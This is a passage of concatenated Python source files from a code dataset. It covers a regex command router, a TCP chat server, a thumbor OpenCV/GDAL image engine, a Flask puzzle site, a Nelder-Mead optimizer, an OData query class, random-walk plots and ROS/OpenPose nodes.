sys.exit(app.exec_())\n","sub_path":"02_signal-slot/FindDialog.py","file_name":"FindDialog.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"570714616","text":"import re\r\n\r\n#DO NOT TOUCH anything until mentioned in comments......\r\n\r\n#Replace 'line' by joining arguments(list) to String\r\n#Following are some test cases:\r\n#line = \"Betty tell me About the Weather at Faridabad\"\r\n#line = \"Betty What hello means\"\r\n#line = \"Betty What is the meaning of hello\"\r\n#line = \"Betty What is the Time\"\r\n#line = \"Betty tell me about movie Om Shanti Om\"\r\n\r\n#Following Functions are to be used to call their respective Modules\r\n\r\ndef weather():\r\n print(\"weather is called\")\r\n regex = r\"weather (of|at|in) \"\r\n if re.search(regex, line, re.M|re.I):\r\n match = re.search(regex, line, re.M|re.I )\r\n location = line[match.end():]\r\n print(location)\r\n #Call Weather API here usinng location\r\n\r\n\r\ndef mean():\r\n print(\"Word mean is called\")\r\n regex = r\"mean\"\r\n if re.search(regex, line, re.M|re.I):\r\n match = re.search(regex, line, re.M|re.I )\r\n i = match.start()-2\r\n while(line[i]!=\" \"):\r\n i=i-1\r\n word = line[i+1:match.start()-1]\r\n print(word)\r\n #call Meaning API here using word\r\n\r\n\r\ndef meaning():\r\n print(\"Word meaning is called\")\r\n regex = r\"meaning (of|at|in) \"\r\n if re.search(regex, line, re.M|re.I):\r\n match = re.search(regex, line, re.M|re.I )\r\n word = line[match.end():]\r\n print(word)\r\n #call Meaning API here using word\r\n\r\ndef time():\r\n print(\"Time is called\")\r\n #call Time API here\r\n\r\ndef movie():\r\n print(\"Movie is called\")\r\n regex = r\" movie \"\r\n if re.search(regex, line, re.M|re.I):\r\n match = re.search(regex, line, re.M|re.I )\r\n movie = line[match.end():]\r\n print(movie)\r\n #call Movie API hereusing movie\r\n \r\n\r\nMODULES = {\r\n \"weather\": weather,\r\n \"mean\":mean,\r\n \"means\":mean,\r\n \"meaning\":meaning,\r\n \"time\":time,\r\n \"movie\":movie\r\n }\r\n\r\n\r\nregex = r\"(( weather )|( meaning )|( mean)|( means)|( time)|( movie ))\"\r\nif re.search(regex, line, re.M|re.I):\r\n match = re.search(regex, line, re.M|re.I )\r\n MODULES[match.group().strip().lower()]()\r\nelse:\r\n print(\"MODULE Not Found\")\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"mregex.py","file_name":"mregex.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"364934914","text":"import socket\nimport time\nhostname=socket.gethostname()\nportnumber=25000\naddress=('',portnumber)\ntcpserver=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ntcpserver.bind(address)\ntcpserver.listen(1)\ntcpclient,address=tcpserver.accept()\nprint(\"Connection established\")\nwhile(1):\n message1=tcpclient.recv(1024).decode()\n localtime = time.asctime( time.localtime(time.time()) )\n print(\"Message received from the client is:\",message1)\n print(\"Time is:\",localtime)\n msg1=input(\"Enter the message\")\n tcpclient.send(msg1.encode())\n print(\"Message send to client as a response from the server is:\",msg1)\ntcpserver.close()\n","sub_path":"code/python code to deploy in docker container/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"440413081","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# thumbor imaging service - opencv engine\n# https://github.com/thumbor/opencv-engine\n\n# Licensed under the MIT license:\n# http://www.opensource.org/licenses/mit-license\n# Copyright (c) 2014 globo.com timehome@corp.globo.com\n\nimport uuid\ntry:\n import cv\nexcept ImportError:\n import cv2.cv as cv\n\nfrom colour import Color\nfrom thumbor.engines import BaseEngine\nfrom pexif import JpegFile, ExifSegment\nimport cv2\nimport gdal\nimport numpy\nfrom osgeo import osr\n\n# need to monkey patch the BaseEngine.get_mimetype function to handle tiffs\n# has to be patched this way b/c called as both a classmethod and instance method internally in thumbor\nold_mime = BaseEngine.get_mimetype\n\n\ndef new_mime(buffer):\n ''' determine the mime type from the raw image data\n Args:\n buffer - raw image data\n Returns:\n mime - mime type of image\n '''\n mime = old_mime(buffer)\n # tif files start with 'II'\n if not mime and buffer.startswith('II'):\n mime = 'image/tiff'\n return mime\n\nBaseEngine.get_mimetype = staticmethod(new_mime)\n\ntry:\n from thumbor.ext.filters import _composite\n FILTERS_AVAILABLE = True\nexcept ImportError:\n FILTERS_AVAILABLE = False\n\nFORMATS = {\n '.jpg': 'JPEG',\n '.jpeg': 'JPEG',\n '.gif': 'GIF',\n '.png': 'PNG',\n '.tiff': 'TIFF',\n '.tif': 'TIFF',\n}\n\n\nclass Engine(BaseEngine):\n\n @property\n def image_depth(self):\n if self.image is None:\n return 8\n return cv.GetImage(self.image).depth\n\n @property\n def image_channels(self):\n if self.image is None:\n return 3\n return self.image.channels\n\n @classmethod\n def parse_hex_color(cls, color):\n try:\n color = Color(color).get_rgb()\n return tuple(c * 255 for c in reversed(color))\n except Exception:\n return None\n\n def gen_image(self, size, color_value):\n img0 = cv.CreateImage(size, self.image_depth, self.image_channels)\n if color_value == 'transparent':\n color = (255, 255, 255, 255)\n else:\n color = self.parse_hex_color(color_value)\n if not color:\n raise ValueError('Color %s is not valid.' % color_value)\n cv.Set(img0, color)\n return img0\n\n def read(self, extension=None, quality=None):\n if not extension and FORMATS[self.extension] == 'TIFF':\n # If the image loaded was a tiff, return the buffer created earlier.\n return self.buffer\n else:\n if quality is None:\n quality = self.context.config.QUALITY\n options = None\n extension = extension or self.extension\n\n # Check if we should write a JPEG. If we are allowing defaulting to jpeg\n # and if the alpha channel is all white (opaque).\n channels = None\n if getattr(self.context.request, 'default_to_jpeg', True):\n channels = cv2.split(numpy.asarray(self.image))\n if len(channels) > 3 and numpy.all(channels[3] == 255):\n extension = '.jpg'\n\n try:\n if FORMATS[extension] == 'JPEG':\n options = [cv.CV_IMWRITE_JPEG_QUALITY, quality]\n except KeyError:\n # default is JPEG so\n options = [cv.CV_IMWRITE_JPEG_QUALITY, quality]\n\n if FORMATS[extension] == 'TIFF':\n channels = channels or cv2.split(numpy.asarray(self.image))\n data = self.write_channels_to_tiff_buffer(channels)\n else:\n data = cv.EncodeImage(extension, self.image, options or []).tostring()\n\n if FORMATS[extension] == 'JPEG' and self.context.config.PRESERVE_EXIF_INFO:\n if hasattr(self, 'exif'):\n img = JpegFile.fromString(data)\n img._segments.insert(0, ExifSegment(self.exif_marker, None, self.exif, 'rw'))\n data = img.writeString()\n\n return data\n\n def create_image(self, buffer, create_alpha=True):\n self.extension = self.extension or '.tif'\n self.no_data_value = None\n # FIXME: opencv doesn't support gifs, even worse, the library\n # segfaults when trying to decoding a gif. An exception is a\n # less drastic measure.\n try:\n if FORMATS[self.extension] == 'GIF':\n raise ValueError(\"opencv doesn't support gifs\")\n except KeyError:\n pass\n\n if FORMATS[self.extension] == 'TIFF':\n self.buffer = buffer\n img0 = self.read_tiff(buffer, create_alpha)\n else:\n imagefiledata = cv.CreateMatHeader(1, len(buffer), cv.CV_8UC1)\n cv.SetData(imagefiledata, buffer, len(buffer))\n img0 = cv.DecodeImageM(imagefiledata, cv.CV_LOAD_IMAGE_UNCHANGED)\n\n if FORMATS[self.extension] == 'JPEG':\n try:\n info = JpegFile.fromString(buffer).get_exif()\n if info:\n self.exif = info.data\n self.exif_marker = info.marker\n except Exception:\n pass\n return img0\n\n def read_tiff(self, buffer, create_alpha=True):\n \"\"\" Reads image using GDAL from a buffer, and returns a CV2 image.\n \"\"\"\n mem_map_name = '/vsimem/{}'.format(uuid.uuid4().get_hex())\n gdal_img = None\n try:\n gdal.FileFromMemBuffer(mem_map_name, buffer)\n gdal_img = gdal.Open(mem_map_name)\n\n channels = [gdal_img.GetRasterBand(i).ReadAsArray() for i in range(1, gdal_img.RasterCount + 1)]\n\n if len(channels) >= 3: # opencv is bgr not rgb.\n red_channel = channels[0]\n channels[0] = channels[2]\n channels[2] = red_channel\n\n if len(channels) < 4 and create_alpha:\n self.no_data_value = gdal_img.GetRasterBand(1).GetNoDataValue()\n channels.append(numpy.float32(gdal_img.GetRasterBand(1).GetMaskBand().ReadAsArray()))\n return cv.fromarray(cv2.merge(channels))\n finally:\n gdal_img = None\n gdal.Unlink(mem_map_name) # Cleanup.\n\n def read_vsimem(self, fn):\n \"\"\"Read GDAL vsimem files\"\"\"\n vsifile = None\n try:\n vsifile = gdal.VSIFOpenL(fn, 'r')\n gdal.VSIFSeekL(vsifile, 0, 2)\n vsileng = gdal.VSIFTellL(vsifile)\n gdal.VSIFSeekL(vsifile, 0, 0)\n return gdal.VSIFReadL(1, vsileng, vsifile)\n finally:\n if vsifile:\n gdal.VSIFCloseL(vsifile)\n\n def write_channels_to_tiff_buffer(self, channels):\n mem_map_name = '/vsimem/{}.tiff'.format(uuid.uuid4().get_hex())\n driver = gdal.GetDriverByName('GTiff')\n w, h = channels[0].shape\n gdal_img = None\n try:\n if len(channels) == 1:\n # DEM Tiff (32 bit floating point single channel)\n gdal_img = driver.Create(mem_map_name, w, h, len(channels), gdal.GDT_Float32)\n outband = gdal_img.GetRasterBand(1)\n outband.WriteArray(channels[0], 0, 0)\n outband.SetNoDataValue(-32767)\n outband.FlushCache()\n outband = None\n gdal_img.FlushCache()\n\n self.set_geo_info(gdal_img)\n return self.read_vsimem(mem_map_name)\n elif len(channels) == 4:\n # BGRA 8 bit unsigned int.\n gdal_img = driver.Create(mem_map_name, h, w, len(channels), gdal.GDT_Byte)\n band_order = [2, 1, 0, 3]\n img_bands = [gdal_img.GetRasterBand(i) for i in range(1, 5)]\n for outband, band_i in zip(img_bands, band_order):\n outband.WriteArray(channels[band_i], 0, 0)\n outband.SetNoDataValue(-32767)\n outband.FlushCache()\n del outband\n del img_bands\n\n self.set_geo_info(gdal_img)\n return self.read_vsimem(mem_map_name)\n finally:\n del gdal_img\n gdal.Unlink(mem_map_name) # Cleanup.\n\n def set_geo_info(self, gdal_img):\n \"\"\" Set the georeferencing information for the given gdal image.\n \"\"\"\n if hasattr(self.context.request, 'geo_info'):\n geo = self.context.request.geo_info\n gdal_img.SetGeoTransform([geo['upper_left_x'], geo['resx'], 0, geo['upper_left_y'], 0, -geo['resy']])\n\n # Set projection\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(3857)\n gdal_img.SetProjection(srs.ExportToWkt())\n gdal_img.FlushCache()\n del srs\n\n @property\n def size(self):\n return cv.GetSize(self.image)\n\n def normalize(self):\n pass\n\n def resize(self, width, height):\n thumbnail = cv.CreateImage(\n (int(round(width, 0)), int(round(height, 0))),\n self.image_depth,\n self.image_channels\n )\n cv.Resize(self.image, thumbnail, cv.CV_INTER_AREA)\n self.image = thumbnail\n\n def crop(self, left, top, right, bottom):\n new_width = right - left\n new_height = bottom - top\n cropped = cv.CreateImage(\n (new_width, new_height), self.image_depth, self.image_channels\n )\n src_region = cv.GetSubRect(self.image, (left, top, new_width, new_height))\n cv.Copy(src_region, cropped)\n\n self.image = cropped\n\n def rotate(self, degrees):\n if (degrees > 180):\n # Flip around both axes\n cv.Flip(self.image, None, -1)\n degrees = degrees - 180\n\n img = self.image\n size = cv.GetSize(img)\n\n if (degrees / 90 % 2):\n new_size = (size[1], size[0])\n center = ((size[0] - 1) * 0.5, (size[0] - 1) * 0.5)\n else:\n new_size = size\n center = ((size[0] - 1) * 0.5, (size[1] - 1) * 0.5)\n\n mapMatrix = cv.CreateMat(2, 3, cv.CV_64F)\n cv.GetRotationMatrix2D(center, degrees, 1.0, mapMatrix)\n dst = cv.CreateImage(new_size, self.image_depth, self.image_channels)\n cv.SetZero(dst)\n cv.WarpAffine(img, dst, mapMatrix)\n self.image = dst\n\n def flip_vertically(self):\n cv.Flip(self.image, None, 1)\n\n def flip_horizontally(self):\n cv.Flip(self.image, None, 0)\n\n def set_image_data(self, data):\n cv.SetData(self.image, data)\n\n def image_data_as_rgb(self, update_image=True):\n # TODO: Handle other formats\n if self.image_channels == 4:\n mode = 'BGRA'\n elif self.image_channels == 3:\n mode = 'BGR'\n else:\n mode = 'BGR'\n rgb_copy = cv.CreateImage((self.image.width, self.image.height), 8, 3)\n cv.CvtColor(self.image, rgb_copy, cv.CV_GRAY2BGR)\n self.image = rgb_copy\n return mode, self.image.tostring()\n\n def draw_rectangle(self, x, y, width, height):\n cv.Rectangle(self.image, (int(x), int(y)), (int(x + width), int(y + height)), cv.Scalar(255, 255, 255, 1.0))\n\n def convert_to_grayscale(self):\n if self.image_channels >= 3:\n # FIXME: OpenCV does not support grayscale with alpha channel?\n grayscaled = cv.CreateImage((self.image.width, self.image.height), self.image_depth, 1)\n cv.CvtColor(self.image, grayscaled, cv.CV_BGRA2GRAY)\n self.image = grayscaled\n\n def paste(self, other_engine, pos, merge=True):\n if merge and not FILTERS_AVAILABLE:\n raise RuntimeError(\n 'You need filters enabled to use paste with merge. Please reinstall ' +\n 'thumbor with proper compilation of its filters.')\n\n self.enable_alpha()\n other_engine.enable_alpha()\n\n sz = self.size\n other_size = other_engine.size\n\n mode, data = self.image_data_as_rgb()\n other_mode, other_data = other_engine.image_data_as_rgb()\n\n imgdata = _composite.apply(\n mode, data, sz[0], sz[1],\n other_data, other_size[0], other_size[1], pos[0], pos[1], merge)\n\n self.set_image_data(imgdata)\n\n def enable_alpha(self):\n if self.image_channels < 4:\n with_alpha = cv.CreateImage(\n (self.image.width, self.image.height), self.image_depth, 4\n )\n if self.image_channels == 3:\n cv.CvtColor(self.image, with_alpha, cv.CV_BGR2BGRA)\n else:\n cv.CvtColor(self.image, with_alpha, cv.CV_GRAY2BGRA)\n self.image = with_alpha\n","sub_path":"opencv_engine/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":12656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"433916811","text":"from flask import render_template, request\nimport os\nfrom json import dumps as to_json_string\nfrom datetime import datetime\nfrom uuid import UUID, uuid4\nfrom traceback import format_exc\n\nfrom application_database import *\nfrom application_utils import *\nimport application_hashes\n\n# Home page\nhost_redirect('/pages/browse.html', '/')\nhost_redirect('/pages/browse.html', '/index.html')\n\n# Short name redirects\nhost_redirect('/pages/browse.html', '/browse.html')\nhost_redirect('/pages/editor.html', '/editor.html')\nhost_redirect('/pages/test.html', '/test.html')\nhost_redirect('/pages/editor_test.html', '/editor_test.html')\nhost_redirect('/pages/validate.html', '/validate.html')\n\n# Large blocks of data\nhost_statically('data')\nhost_statically('engine')\nhost_statically('sourcemaps')\n\n# Actual page sources\nhost_statically('pages/browse.html')\nhost_statically('pages/browse.js')\nhost_statically('pages/editor.html')\nhost_statically('pages/editor.js')\nhost_statically('pages/test.html', protected=True)\nhost_statically('pages/test.js', protected=True)\nhost_statically('pages/editor_test.html', protected=True)\nhost_statically('pages/editor_test.js', protected=True)\nhost_statically('pages/validate.html')\n\ndef page_not_found(error):\n return render_template('404_generic.html'), 404\napplication.register_error_handler(404, page_not_found)\n\ndef handle_exception(exc):\n message = f'Caught a {type(exc).__name__}: {format_exc()}'\n add_feedback(message)\n return '', 500\napplication.register_error_handler(Exception, handle_exception)\n\n# Publishing puzzles\ndef publish():\n puzzle_json = request.form['puzzle']\n solution_json = request.form['solution']\n\n valid, data = validate_and_capture_image(puzzle_json, solution_json)\n if not valid:\n add_feedback(data)\n return '', 400\n else:\n display_hash = create_puzzle(puzzle_json, solution_json, data)\n return display_hash, 200\napplication.add_url_rule('/publish', 'publish', publish, methods=['POST'])\n\n# Playing published puzzles\ndef play(display_hash):\n puzzle = get_puzzle(display_hash)\n if not puzzle or not puzzle.puzzle_json:\n return render_template('404_puzzle.html', display_hash=display_hash)\n\n session_id = uuid4()\n start_session(session_id)\n return render_template('play_template.html',\n puzzle=puzzle.puzzle_json,\n display_hash=display_hash,\n session_id=session_id,\n title=puzzle.title,\n image=puzzle.url\n )\napplication.add_url_rule('/play/', 'play', play)\n\n# Getting puzzles from the DB to show on the browse page\ndef browse():\n sort_type = request.args.get('sort_type', 'date') # date\n order = request.args.get('order', '') # asc, desc\n puzzles = get_puzzles(sort_type, order)\n\n output = []\n for puzzle in puzzles:\n output.append({\n 'display_hash': puzzle.display_hash,\n 'url': puzzle.url,\n 'title': puzzle.title,\n })\n return to_json_string(output)\napplication.add_url_rule('/browse', 'browse', browse)\n\n# Users providing feedback or internal bug reports\ndef feedback():\n add_feedback(request.form['data'])\n return '', 200\napplication.add_url_rule('/feedback', 'feedback', feedback, methods=['POST'])\n\n# Firing telemetry\ndef telemetry():\n session_id = UUID(request.form['session_id'])\n type = request.form['type']\n date = None\n if 'date' in request.form:\n date = datetime.fromtimestamp(int(request.form['date']) / 1000)\n add_event(session_id, type, date)\n\n return '', 200\napplication.add_url_rule('/telemetry', 'telemetry', telemetry, methods=['POST'])\n\n# Viewing telemetry\ndef dashboard():\n if not request_is_authorized():\n return '', 401, {'WWW-Authenticate': 'Basic realm=\"\"'}\n rows = get_all_rows()\n return render_template('dashboard_template.html', data=rows)\napplication.add_url_rule('/dashboard.html', 'dashboard.html', dashboard)\n\nif __name__ == '__main__':\n extra_files = []\n for root, dirs, files in os.walk('.'):\n if 'images' in root:\n continue\n for file in files:\n extra_files.append(root + os.sep + file)\n application.run(extra_files=extra_files)\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"35972750","text":"import numpy as np\n\n\ndef tf(x):\n return x[0] ** 2 + x[0] * x[1] + x[1] ** 2 - 6 * x[0] - 9 * x[1]\n\n\ndef test_func(x):\n return 1.2 * x[0] * x[0] - 2.4 * x[1] - 1.6\n\n\ndef totuple(a):\n try:\n return tuple(totuple(i) for i in a)\n except TypeError:\n return a\n\n\nclass NelderMead():\n def __init__(self):\n pass\n\n def minimize(self, f, alpha=1, beta=0.5, gamma=2, max_iterations=100):\n\n v1 = np.array([1., 0])\n v2 = np.array([0, 0])\n v3 = np.array([0, 1.])\n\n print(\"f(v1) = \", f(v1))\n print(\"f(v2) = \", f(v2))\n print(\"f(v3) = \", f(v3))\n\n print(\"==============================================================\")\n\n for i in range(max_iterations):\n print(\"Итерация №\", i)\n sdict = {totuple(v1): f(v1), totuple(v2): f(v2), totuple(v3): f(v3)}\n points = sorted(sdict.items(), key=lambda item: item[1])\n\n best = np.array(points[0][0])\n good = np.array(points[1][0])\n worst = np.array(points[2][0])\n print(f(best), f(good), f(worst))\n # отражение\n mid = (best + good) / 2\n print(mid)\n xr = mid + alpha * (mid - worst)\n print(xr)\n if f(xr) < f(good):\n worst = xr\n else:\n if f(xr) < f(worst):\n worst = xr\n c = (worst + mid) / 2\n if f(c) < f(worst):\n worst = c\n if f(xr) < f(best):\n # растяжение\n xe = mid + gamma * (xr - mid)\n if f(xe) < f(xr):\n worst = xe\n else:\n worst = xr\n if f(xr) > f(good):\n #\n xc = mid + beta * (worst - mid)\n if f(xc) < f(worst):\n worst = xc\n v1 = worst\n v2 = good\n v3 = best\n print(v1, v2, v3)\n print(\"==============================================================\")\n return best\n\n\nif __name__ == \"__main__\":\n n = NelderMead()\n point = n.minimize(tf, max_iterations=100)\n print(\"РЕЗУЛЬТАТ\\n\", point)\n print(tf(point))\n","sub_path":"nmopt.py","file_name":"nmopt.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"117539033","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nQuerying\n========\n\nEntities can be queried from a service's singletons with a QuerySingle object:\n\n.. code-block:: python\n\n query = Service.querySingle(Order)\n\nAdding selects and other options always creates a new Query object with the\ngiven directives:\n\n.. code-block:: python\n\n >>> query.filter(Order.Name == 'Foo')\n >\n\nThis makes object chaining possible:\n\n.. code-block:: python\n\n >>> first_order = query.filter(...).filter(...).order_by(...).first()\n\nThe resulting objects can be fetched with :py:func:`~QuerySingle.get`. \nNetwork is not accessed until this method is triggered.\n\nNavigation properties can be loaded in the same request with \n:py:func:`~QuerySingle.expand`:\n\n.. code-block:: python\n\n >>> querySingle.expand(Order.Shipper, Order.Customer)\n >>> order = querySingle.get()\n\n----\n\nAPI\n---\n\"\"\"\n\ntry:\n # noinspection PyUnresolvedReferences\n from urllib.parse import urljoin\nexcept ImportError:\n # noinspection PyUnresolvedReferences\n from urlparse import urljoin\n\nimport odata.exceptions as exc\n\n\nclass QuerySingle(object):\n \"\"\"\n This class should not be instantiated directly, but from a\n :py:class:`~odata.service.ODataService` object.\n \"\"\"\n def __init__(self, entitycls, connection=None, options=None):\n self.entity = entitycls\n self.options = options or dict()\n self.connection = connection\n\n def get(self):\n url = self._get_url()\n options = self._get_options()\n data = self.connection.execute_get(url, options)\n return self._create_model(data)\n \n\n def __repr__(self):\n return ''.format(self.entity)\n\n def __str__(self):\n return self.as_string()\n\n def _get_url(self):\n return self.entity.__odata_single_url__()\n\n def _get_options(self):\n \"\"\"\n Format current query options to a dict that can be passed to requests\n :return: Dictionary\n \"\"\"\n options = dict()\n\n _top = self.options.get('$top')\n if _top is not None:\n options['$top'] = _top\n\n _offset = self.options.get('$skip')\n if _offset is not None:\n options['$skip'] = _offset\n\n _select = self.options.get('$select')\n if _select:\n options['$select'] = ','.join(_select)\n\n _filters = self.options.get('$filter')\n if _filters:\n options['$filter'] = ' and '.join(_filters)\n\n _expand = self.options.get('$expand')\n if _expand:\n options['$expand'] = ','.join(_expand)\n\n _order_by = self.options.get('$orderby')\n if _order_by:\n options['$orderby'] = ','.join(_order_by)\n return options\n\n def _create_model(self, row):\n if len(self.options.get('$select', [])):\n return row\n else:\n e = self.entity.__new__(self.entity, from_data=row)\n es = e.__odata__\n es.connection = self.connection\n return e\n\n def _get_or_create_option(self, name):\n if name not in self.options:\n self.options[name] = []\n return self.options[name]\n\n def _format_params(self, options):\n return '&'.join(['='.join((key, str(value))) for key, value in options.items() if value is not None])\n\n def _new_query(self):\n \"\"\"\n Create copy of this query without mutable values. All query builders\n should use this first.\n\n :return: Query instance\n \"\"\"\n o = dict()\n o['$top'] = self.options.get('$top', None)\n o['$skip'] = self.options.get('$skip', None)\n o['$select'] = self.options.get('$select', [])[:]\n o['$filter'] = self.options.get('$filter', [])[:]\n o['$expand'] = self.options.get('$expand', [])[:]\n o['$orderby'] = self.options.get('$orderby', [])[:]\n return QuerySingle(self.entity, options=o, connection=self.connection)\n\n def as_string(self):\n query = self._format_params(self._get_options())\n return urljoin(self._get_url(), '?{0}'.format(query))\n\n # Query builders ###########################################################\n\n def select(self, *values):\n \"\"\"\n Set properties to fetch instead of full Entity objects\n\n :return: Raw JSON values for given properties\n \"\"\"\n q = self._new_query()\n option = q._get_or_create_option('$select')\n for prop in values:\n option.append(prop.name)\n return q\n\n def expand(self, *values):\n \"\"\"\n Set ``$expand`` query parameter\n\n :param values: ``Entity.Property`` instance\n :return: Query instance\n \"\"\"\n q = self._new_query()\n option = q._get_or_create_option('$expand')\n for prop in values:\n option.append(prop.name)\n return q\n","sub_path":"odata/querysingle.py","file_name":"querysingle.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"375238292","text":"import math;\nfrom math import sqrt;\n\ndef getVariance(theMean,count,listSet=[]):\n\ttotal = 0\n\n\tfor nums in listSet:\n\t\tnums = float(nums)\n\t\ttotal += ((nums - theMean)**2)\n\tvariance = total/count\n\tvariance = math.sqrt(variance)\n\tprint(\"The standard deviation of this set is: \", variance);\n\tif variance > theMean:\n\t\tprint(\"This set has a high standard deviation\")\n\telse:\n\t\tprint(\"This set has a low standard deviation\")\n\n\n\n\ndef getMean(total,count):\n\ttheMean = 0;\n\ttheMean = total/count\n\tprint(\"The mean of this set is: \", theMean);\n\treturn theMean;\n\n\ndef addSet(count,listSet=[],):\n\ttotal = 0;\n\tfor x in listSet:\n\t\tx = float(x);\n\t\ttotal += x\n\tthemean = getMean(total, count);\n\tgetVariance(themean,count,listSet)\n\treturn;\n\ndef getInput():\n\tcount = 0;\n\tlistSet=[];\n\tflag = True;\n\n\twhile flag != False:\n\t\tlistSet.append(input(f\"Enter count: {count} of data set: \"));\n\t\tcount +=1;\n\t\tcheck = input(\"Do you have more to add 'y/n':\");\n\t\tif check == 'y':\n\t\t\tflag = True\n\t\telse:\n\t\t\tflag = False\n\t\t\taddSet(count,listSet);\n\t\t\treturn;\n\n\ndef main():\n\tgetInput()\n\treturn;\n\nmain();","sub_path":"randomcodings/standard.py","file_name":"standard.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"223739087","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef built_in_walk():\n position = 0\n walk = [position]\n for i in range(100):\n step = 1 if random.randint(0, 1) else -1\n position += step\n walk.append(position)\n f = plt.figure(figsize = (8, 6))\n ax = f.add_subplot(111)\n ax.set_title(\"built-in random walk\")\n ax.plot(walk[:100])\n plt.show()\n\ndef numpy_walk():\n SIZE = 100\n a = np.random.randint(0, 2, SIZE)\n b = np.where(a > 0, 1, -1)\n f = plt.figure(figsize = (8, 6))\n ax = f.add_subplot(111)\n ax.set_title(\"numpy random walk\")\n ax.plot(b.cumsum())\n plt.show()\n\ndef numpy_multiple_walk():\n LIMIT = 10\n SIZE = 50\n COUNT = 10\n a = np.random.randint(0, 2, [COUNT, SIZE])\n a = np.where(a > 0, 1, -1)\n walks = a.cumsum(1)\n f = plt.figure(figsize = (8, 6))\n ax = f.add_subplot(111)\n max = walks.max();\n min = walks.min();\n title = f\"max: {max}, min: {min}\"\n ax.set_title(title)\n ax.plot(walks.T)\n hits = (np.abs(walks) > LIMIT).any(1)\n #crossing_temp = (np.abs(walks[hits]) >= LIMIT).argmax(1)\n crossing_temp = (np.abs(walks[hits]))\n print(crossing_temp)\n plt.show()\n\n\nif __name__ == \"__main__\":\n #built_in_walk()\n #numpy_walk()\n numpy_multiple_walk()\n","sub_path":"python/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"18365136","text":"#! /usr/bin/env python\n\nimport rospy\nfrom std_msgs.msg import Int32\n\nclass Publisher():\n def __init__(self):\n self.pub_ = rospy.Publisher(\"/talk\", Int32, queue_size=1)\n self.msg_ = Int32()\n self.msg_.data = 0\n\n def doWork(self):\n self.pub_.publish(self.msg_)\n self.msg_.data += 1\n\ndef main():\n rospy.init_node(\"simple_pub_iterative_class_node\")\n\n publisher = Publisher()\n\n # 2Hz Rate:\n\n rate = rospy.Rate(2)\n while(not rospy.is_shutdown()):\n publisher.doWork()\n rate.sleep()\n\nif __name__ == \"__main__\":\n\n try:\n main()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"basics/rospy/simple_pub_py/src/simple_pub_iterative_class.py","file_name":"simple_pub_iterative_class.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583622508","text":"#Author : Yuan Wang\n#Date : 2018-05-26\n\n#********************************************************************************** \n# \n# Given a sorted array, remove the duplicates in place such that each element appear \n# only once and return the new length.\n# \n# Do not allocate extra space for another array, you must do this in place with constant memory.\n# \n# For example,\n# Given input array A = [1,1,2],\n# \n# Your function should return length = 2, and A is now [1,2].\n# \n#\t \n#**********************************************************************************/\n\n#worked well with less time,accepted by the leetcode.com\ndef removeDuplicatesA(nums):\n\t\"\"\"\n\t:type nums: List[int]\n\t:rtype: int\n\n\t\"\"\"\n\tif not nums:\n\t\treturn 0\n\tk=0 \n\tfor i in range(1,len(nums)): \n\t\tif nums[i] != nums[k]: \n\t\t\tk+=1 \n\t\t\tnums[k] = nums[i] \n\t \n\t#del nums[k+1:len(nums)]\n\n\treturn k+1\n\n#worked well but slow for large array\t\ndef removeDuplicatesB(nums):\n\tfor i in nums:\n\t\trepeat=nums.count(i)\n\t\tif repeat > 1:\n\t\t\tfor j in range(repeat-1):\n\t\t\t\tnums.remove(i)\n\n\treturn len(nums)\n#worked well but slow for large array\t\ndef removeDuplicatesC(nums):\n\tfor i in nums:\n\t\twhile(nums.count(i)>1):\n\t\t\tnums.remove(i)\n\treturn len(nums)\n\nA=[1,1,2,3,3,3,4,4,5]\ncount=removeDuplicatesA(A)\nprint(A[:count])\n","sub_path":"Array/removeDuplicatesFromSortedArray.py","file_name":"removeDuplicatesFromSortedArray.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"14953524","text":"#!/usr/bin/env python\nimport cv2\nimport numpy as np\nimport rospy\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom openpose_ros_msgs.msg import OpenPoseHumanList, OpenPoseHuman, PointWithProb\nfrom sensor_msgs.msg import Image, RegionOfInterest\n\nbridge = CvBridge()\nrect = []\n\n\nclass OpenPoseROSTracker():\n\n def __init__(self):\n rospy.init_node('openpose_tracker', anonymous=True)\n\n rospy.Subscriber(\"/openpose_ros/human_list\", OpenPoseHumanList, self.callback)\n rospy.Subscriber(\"/camera/rgb/image_raw\", Image, self.image_callback)\n self.roi_pub = rospy.Publisher(\"/roi\", RegionOfInterest, queue_size=1)\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\n def callback(self, data):\n global rect\n # rospy.loginfo(rospy.get_caller_id() + \"I heard %s\", data)\n n_humans = 